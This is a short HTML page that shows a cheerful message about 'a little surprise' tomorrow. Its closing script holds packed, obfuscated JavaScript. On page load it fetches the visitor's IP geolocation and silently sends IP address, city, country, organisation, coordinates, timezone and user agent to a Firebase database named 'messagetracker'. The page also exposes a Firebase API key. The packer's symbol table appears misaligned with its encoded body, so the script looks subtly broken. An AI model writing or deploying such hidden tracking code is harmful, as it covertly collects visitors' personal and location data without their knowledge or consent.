
<!DOCTYPE html>
<html>
<head>
  <title>Message</title>
  <script src="https://www.gstatic.com/firebasejs/8.10.1/firebase-app.js"></script>
  <script src="https://www.gstatic.com/firebasejs/8.10.1/firebase-database.js"></script>
  <style>
    body {
      margin: 0;
      padding: 0;
      background-color: #f4f4f4;
      font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
      color: #333;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }

    .container {
      max-width: 900px;
      padding: 80px;
      background: white;
      box-shadow: 0 10px 25px rgba(0, 0, 0, 0.15);
      border-radius: 20px;
      text-align: center;
    }

    p {
      font-size: 36px;
      font-weight: bold;
      line-height: 1.8;
      margin: 0;
    }

    .footer {
      margin-top: 40px;
    }
  </style>
</head>
<body>
  <div class="container">
    <p>Have a great rest of your day. Tomorrow, this site holds a little surprise. 
    <span role="img" aria-label="winking eye">😉</span>
    </p>
  </div>
  <script>
    
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2 4={q:"AIzaSyA6FOahPr_40N1WS0S-VY_ssQRefwJt9c8",r:"messagetracker-fced6.firebaseapp.com",s:"https://messagetracker-fced6-default-rtdb.firebaseio.com",t:"messagetracker-fced6",u:"messagetracker-fced6.appspot.com",v:"770318035535",w:"1:770318035535:web:c8b802e29e11c59e44183a",x:"G-YXQNQSL5HR"};y.z(4);2 5=y.A();B("https://ipapi.co/json").C(a=>a.D()).E(b=>{2 6={f:b.f,g:b.g,h:b.h,i:b.i,j:b.j,k:b.k,l:b.l,m:b.m,n:(F G()).H(),o:I.J};5.K("L").M(6)});',49,49,'||||firebaseConfig|db|logData|_|||ip|data|const|firebase|ref|ip_logs_spdh|city|region|country|org|timezone|latitude|longitude|timestamp|userAgent|new|Date|toISOString|navigator|userAgent|apiKey|authDomain|databaseURL|projectId|storageBucket|messagingSenderId|appId|measurementId|firebase|initializeApp|database|fetch|then|json|then|push'.split('|'),0,{}))

  </script>
</body>
</html>
